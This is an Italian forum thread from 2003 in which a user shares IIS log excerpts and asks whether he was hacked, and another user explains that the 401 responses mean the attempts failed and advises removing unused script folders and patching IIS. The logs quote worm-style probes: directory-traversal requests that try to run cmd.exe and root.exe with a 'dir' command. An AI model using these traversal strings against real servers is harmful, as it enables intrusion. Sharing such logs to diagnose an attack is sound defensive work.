file di log IIS - sono stato hakerato?

**nik600** · 16-10-2003, 14:51

ciao ragazzi non mene intendo molto di file di log...ma guardarno qesti pezzetti di file a me sembra che qualcuno abbia voluto lanciare il prompt dei comandi o cos'altro! e si che la porta 80 su firewall è chiusa!!

prima c'è sto pezzo: guardate l'ora!

#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-10-11 01:28:41 62.194.101.101 - 192.168.100.105 80 GET /scripts/nsiislog.dll - 401 -
2003-10-11 02:57:17 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:18 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:20 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:22 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:24 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:25 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:28 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:29 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:31 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:33 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600

e qui?

2003-10-13 16:24:07 152.99.72.82 - 192.168.100.105 80 GET /scripts/nsiislog.dll - 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /scripts/root.exe /c+dir 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /MSADC/root.exe /c+dir 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:36 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -

sapreste aiutarmi? grazie

**seclimar** · 16-10-2003, 14:56

se non erro nel protocollo HTTP
la risposta 401 e'
UTENTE Non autorizzato

quindi ti sei salvato!

pero'.. togli le cartelle con gli script se non le usi e proteggi bene IIS cone le patch microsoft...

se la risposta e' 200 allora e' andata a buon fine!

per altre info prova a cercare i messaggi di errore HTTP su internet

**nik600** · 16-10-2003, 15:05

allora io dovrei lasciare sotto la cartella inetpub solamente wwwroot, giusto?

io ho delle pagine asp ma sinceramente queste cartelle:

adminscripts
ftproot
iissamples
mailroot
scripts

non le ho mai usate! le sposto in un'altra cartella, fuori da inetpub?

sai un'altra cosa strana? io ho il firewall con la porta 80 chiusa...eppure li mi sembra che il collegamento sia avvenuto sulla porta 80 ! come è possibile?

grazie

**seclimar** · 16-10-2003, 15:26

se tu hai la porta 80 chiusa.. NON ti puo' funzionare il sito web dall'esterno!

quindi la 80 deve essere aperta!

adminscripts
ftproot
iissamples
mailroot
scripts

togli quelle che non ti servono..
mailroot: devi prima disinstallare il SMTP
ftproot: devi prima disinstallare il FTP server
ecc..
controlla prima se sono usate da IIS.. nel caso..cancella prima da IIS

**nik600** · 16-10-2003, 15:32

la cosa strana è che il mio sito non si vede da internet! al momento io non ho domini sul web...e nemmeno ip statici, quindi se volessi vedere il mio sito "da internet" l'unico modo è vedere che ip ha la mia macchina in questo momento e digitarlo come indirizzo.

però, dato che la porta 80 è chiusa dal firewall , giustamente a me non funziona.

ma allora come hanno fatto a entrare? hanno aggirato il firewall?

**seclimar** · 16-10-2003, 15:37

controlla quel ip che hai sui log e guarda se era il tuo

**nik600** · 16-10-2003, 15:43

ora che mi ci fai pensare alcuni messaggi possono essere relativi ai tentativi che avevo provato a fare io...ma non certo quelli alle una di notte che si ripetono in tutti i file di log degli utlimi giorni!

**seclimar** · 16-10-2003, 15:54

beh..
allora fai delle prove dall'esterno ad arrivare al tuo pc!
se mi dai il link in privato ti dico se entro

**seclimar** · 16-10-2003, 16:47

non posso entrare..
hai messo la windows authenticatione mi chiede user e password!

**nik600** · 16-10-2003, 16:47

ok ti ho mandato un mex pvt...grazie!

Discussione: file di log IIS - sono stato hakerato?

Strumenti discussione

Ricerca discussione

Visualizza

file di log IIS - sono stato hakerato?

Permessi di invio